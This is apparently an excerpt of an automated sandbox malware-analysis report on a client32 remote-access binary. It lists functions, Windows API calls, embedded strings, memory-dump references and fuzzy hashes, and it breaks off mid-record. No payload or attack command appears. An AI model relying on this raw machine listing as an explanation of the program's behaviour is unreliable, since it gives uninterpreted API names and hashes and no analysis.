                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ItemMenu$_memset$CheckCountEnableInfoVersion
                                                                                  • String ID: 0
                                                                                  • API String ID: 176136580-4108050209
                                                                                  • Opcode ID: 952994a233711950fdab02d23ca0bcaac5a8ee4e392a6680f60084daabe75429
                                                                                  • Instruction ID: be0221c4a5135c336c62c383b80ea9a6d71c1dc3530fa78f313eaeef8d4c2bd6
                                                                                  • Opcode Fuzzy Hash: 952994a233711950fdab02d23ca0bcaac5a8ee4e392a6680f60084daabe75429
                                                                                  • Instruction Fuzzy Hash: C621A17591111AABE741DB74CE84FAFBBACEF46358F104025F961E6160DB74DA00C772
                                                                                  Function 110812A0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 74COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _memmove.LIBCMT ref: 1108132F
                                                                                  • _memset.LIBCMT ref: 11081318
                                                                                    • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                    • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                    • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                    • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorExitLastMessageProcess_memmove_memsetwsprintf
                                                                                  • String ID: ..\CTL32\DataStream.cpp$IsA()$m_iPos>=nBytes$nBytes>=0$pData
                                                                                  • API String ID: 75970324-4264523126
                                                                                  • Opcode ID: d8c9cfc558a83648f442f3398f9905bd9548d166cd1f75af1a89d4c0a32f60db
                                                                                  • Instruction ID: 3f790bad6e390bc8ea8a8f21c3872a9d67b2f4e4425326796fba8d3d5e2d5bab
                                                                                  • Opcode Fuzzy Hash: d8c9cfc558a83648f442f3398f9905bd9548d166cd1f75af1a89d4c0a32f60db
                                                                                  • Instruction Fuzzy Hash: 6B11EB7DF143126FC605DF41EC43F9AF3D4AF9064CF108039E94A27241E571B808C6A1
                                                                                  Function 1103F450 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 43sleepCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • IsWindow.USER32(00000000), ref: 1103F466
                                                                                  • FindWindowA.USER32(PCIVideoSlave32,00000000), ref: 1103F47C
                                                                                  • IsWindow.USER32(00000000), ref: 1103F484
                                                                                  • Sleep.KERNEL32(00000014), ref: 1103F497
                                                                                  • FindWindowA.USER32(PCIVideoSlave32,00000000), ref: 1103F4A7
                                                                                  • IsWindow.USER32(00000000), ref: 1103F4AF
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Window$Find$Sleep
                                                                                  • String ID: PCIVideoSlave32
                                                                                  • API String ID: 2137649973-2496367574
                                                                                  • Opcode ID: f9403fe9dea3d152aead7fa3d2adf20292fef7f356e696344d66dd2b7210a141
                                                                                  • Instruction ID: 349d86511175fe1d1df632f2bffc72f1f56a45a46628263fa2557b0125cca1c8
                                                                                  • Opcode Fuzzy Hash: f9403fe9dea3d152aead7fa3d2adf20292fef7f356e696344d66dd2b7210a141
                                                                                  • Instruction Fuzzy Hash: 44F0A473A4122A6EDB01EFF98DC4FA6B7D8AB84699F410074E968D7109F634E8014777
                                                                                  Function 11003400 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 41windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • LoadMenuA.USER32(00000000,00002EFF), ref: 1100340E
                                                                                  • GetSubMenu.USER32(00000000,00000000), ref: 1100343A
                                                                                  • GetSubMenu.USER32(00000000,00000000), ref: 1100345C
                                                                                  • DestroyMenu.USER32(00000000), ref: 1100346A
                                                                                    • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                    • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                    • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                    • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Menu$DestroyErrorExitLastLoadMessageProcesswsprintf
                                                                                  • String ID: ..\CTL32\annotate.cpp$hMenu$hSub
                                                                                  • API String ID: 468487828-934300333
                                                                                  • Opcode ID: cb09c6b33aa2397f6040dc9ac8fe113c92c7d1ba2ee6536d01521099fc9f1030
                                                                                  • Instruction ID: 1378fb0f7ab2c0978cd4d50cac7dc25882af45c4d25f08e40c7e232078aa5069
                                                                                  • Opcode Fuzzy Hash: cb09c6b33aa2397f6040dc9ac8fe113c92c7d1ba2ee6536d01521099fc9f1030
                                                                                  • Instruction Fuzzy Hash: B3F0E93AE9063573E25252A71C86F9FE2488B45699F500032F926BA580EA14B80043E9
                                                                                  Function 11003310 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 37windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • LoadMenuA.USER32(00000000,00002EF9), ref: 1100331D
                                                                                  • GetSubMenu.USER32(00000000,00000000), ref: 11003343
                                                                                  • GetMenuItemCount.USER32(00000000), ref: 11003367
                                                                                  • DestroyMenu.USER32(00000000), ref: 11003379
                                                                                    • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                    • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                    • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                    • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Menu$CountDestroyErrorExitItemLastLoadMessageProcesswsprintf
                                                                                  • String ID: ..\CTL32\annotate.cpp$hMenu$hSub
                                                                                  • API String ID: 4241058051-934300333
                                                                                  • Opcode ID: 85d4a40678ea7b6d13a0383658e2681328b2af046e894752399e51aa99d6900d
                                                                                  • Instruction ID: a78e3c2f88e64c1b086a81e8c9a2b46f663d882bee818e15e56a3ec0b04889ae
                                                                                  • Opcode Fuzzy Hash: 85d4a40678ea7b6d13a0383658e2681328b2af046e894752399e51aa99d6900d
                                                                                  • Instruction Fuzzy Hash: AEF02E36E9093A73D25212B72C4AFCFF6584F456ADB500031F922B5645EE14A40053A9
                                                                                  Function 11025712 Relevance: 12.1, APIs: 8, Instructions: 121windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetWindowTextA.USER32(?,?,00000050), ref: 11025766
                                                                                  • _strncat.LIBCMT ref: 1102577B
                                                                                  • SetWindowTextA.USER32(?,?), ref: 11025788
                                                                                    • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                    • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                    • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                  • GetDlgItemTextA.USER32(?,00001395,?,00000040), ref: 11025814
                                                                                  • GetDlgItemTextA.USER32(?,00001397,?,00000040), ref: 11025828
                                                                                  • SetDlgItemTextA.USER32(?,00001397,?), ref: 11025840
                                                                                  • SetDlgItemTextA.USER32(?,00001395,?), ref: 11025852
                                                                                  • SetFocus.USER32(?), ref: 11025855
                                                                                    • Part of subcall function 11025260: GetDlgItem.USER32(?,?), ref: 110252B0
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Text$Item$Window$Focus_malloc_memset_strncatwsprintf
                                                                                  • String ID:
                                                                                  • API String ID: 3832070631-0
                                                                                  • Opcode ID: 7bedf844c1c4ce4bd4cf84ee3ec1953557bc0074e6a750ec634dd3c80f65a2ee
                                                                                  • Instruction ID: bfe7d5249f4b6e1d02486e1e3511efca77028c7631b8c8a816f62769cf0b8b3d
                                                                                  • Opcode Fuzzy Hash: 7bedf844c1c4ce4bd4cf84ee3ec1953557bc0074e6a750ec634dd3c80f65a2ee
                                                                                  • Instruction Fuzzy Hash: 5D41A1B1A40349ABE710DB74CC85BBAF7F8FB44714F004969E62A97680EBB4A904CB54
                                                                                  Function 110EF790 Relevance: 12.1, APIs: 8, Instructions: 84filememoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetFileSize.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,111323D6,00000000,?), ref: 110EF7A8
                                                                                  • ReadFile.KERNEL32(00000000,00000000,0000000E,?,00000000,?,111323D6,00000000,?), ref: 110EF7BD
                                                                                  • GlobalAlloc.KERNEL32(00000042,-0000000E,00000000), ref: 110EF7DF
                                                                                  • GlobalLock.KERNEL32(00000000), ref: 110EF7EC
                                                                                  • ReadFile.KERNEL32(00000000,00000000,-0000000E,0000000E,00000000), ref: 110EF7FB
                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 110EF80B
                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 110EF825
                                                                                  • GlobalFree.KERNEL32(00000000), ref: 110EF82C
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Global$File$ReadUnlock$AllocFreeLockSize
                                                                                  • String ID:
                                                                                  • API String ID: 3489003387-0
                                                                                  • Opcode ID: dd8f80031ae181a8ed5eea704e92fea1ffadc77db63c751e718b3c2d07927bee
                                                                                  • Instruction ID: 752bd59a7f8b278135cd4218b820f19d57544efb101fbb4cfc0774b0aabdd1bf
                                                                                  • Opcode Fuzzy Hash: dd8f80031ae181a8ed5eea704e92fea1ffadc77db63c751e718b3c2d07927bee
                                                                                  • Instruction Fuzzy Hash: 3721C532A41019AFD704DFA5CA89AFEB7FCEB4421AF0001AEF91997540DF709901C7E2
                                                                                  Function 11089950 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 228COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 11088C40: IsWindow.USER32(?), ref: 11088C5F
                                                                                    • Part of subcall function 11088C40: IsWindow.USER32(?), ref: 11088C6D
                                                                                  • GetParent.USER32(00000000), ref: 11089996
                                                                                  • GetParent.USER32(00000000), ref: 110899A7
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ParentWindow
                                                                                  • String ID: .chm$.hlp$WinHelp cmd=%d, id=%d, file=%s$debughlp.$$$
                                                                                  • API String ID: 3530579756-3361795001
                                                                                  • Opcode ID: 434b2cb741835ac03b002844321d47e96989c184908e24c31a4124005bd277de
                                                                                  • Instruction ID: dcd0680657676d00064f31b5da51888b306acc0f32f54203c3ee3b251bcfdaac
                                                                                  • Opcode Fuzzy Hash: 434b2cb741835ac03b002844321d47e96989c184908e24c31a4124005bd277de
                                                                                  • Instruction Fuzzy Hash: F5712774E0426AAFDB11DFA4DD81FEFB7E8EF85308F4040A5E909A7241E771A944CB91
                                                                                  Function 1101B530 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 204libraryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 110DEB60: EnterCriticalSection.KERNEL32(111EE0A4,11018BE8,50D94AA1,?,?,?,111CD988,11187878,000000FF,?,1101ABB2), ref: 110DEB61
                                                                                    • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                    • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                    • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                  • std::exception::exception.LIBCMT ref: 1101B776
                                                                                  • __CxxThrowException@8.LIBCMT ref: 1101B791
                                                                                  • LoadLibraryA.KERNEL32(NSSecurity.dll,00000000,111CD988), ref: 1101B7AE
                                                                                    • Part of subcall function 11008DD0: std::_Xinvalid_argument.LIBCPMT ref: 11008DEA
                                                                                  Strings
                                                                                  • NSSecurity.dll, xrefs: 1101B7A3
                                                                                  • NsAppSystem Info : Control Channel Command Sent : %d, xrefs: 1101B70A
                                                                                  • NsAppSystem Info : Control Channel Sending Command : %d, xrefs: 1101B6E9
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CriticalEnterException@8LibraryLoadSectionThrowXinvalid_argument_malloc_memsetstd::_std::exception::exceptionwsprintf
                                                                                  • String ID: NSSecurity.dll$NsAppSystem Info : Control Channel Command Sent : %d$NsAppSystem Info : Control Channel Sending Command : %d
                                                                                  • API String ID: 3515807602-1044166025
                                                                                  • Opcode ID: 7a2bf5ffa17c4bb655a0ec223d7da8cb5fbd7026380f7eb9f48cf61b11f3b8ad
                                                                                  • Instruction ID: 97a0dec6d0d64d3c3877ebf05293913b11e378911f3366e288316342895a3808
                                                                                  • Opcode Fuzzy Hash: 7a2bf5ffa17c4bb655a0ec223d7da8cb5fbd7026380f7eb9f48cf61b11f3b8ad
                                                                                  • Instruction Fuzzy Hash: 72718FB5D00309DFEB10CFA4C844BDDFBB4AF19318F244569E915AB381DB79AA44CB91
                                                                                  Function 110717D0 Relevance: 10.7, APIs: 3, Strings: 4, Instructions: 176COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • EnterCriticalSection.KERNEL32(?,50D94AA1,76937CB0,76937AA0,?,76937CB0,76937AA0), ref: 11071824
                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 11071838
                                                                                    • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                    • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                    • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                    • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                  • LeaveCriticalSection.KERNEL32(00000000,?,?), ref: 110719B1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CriticalSection$Leave$EnterErrorExitLastMessageProcesswsprintf
                                                                                  • String ID: ..\ctl32\Connect.cpp$Register NC_CHATEX for conn=%s, q=%p$queue$r->queue != queue
                                                                                  • API String ID: 624642848-3840833929
                                                                                  • Opcode ID: 3f5b2276da03322f2c0effce7b3b564e392dbc3a3c940142a110668279eae6c1
                                                                                  • Instruction ID: 4c47afc427fc1e2a273e18b082198136771a32f8cb6ee563f570ada24247464b
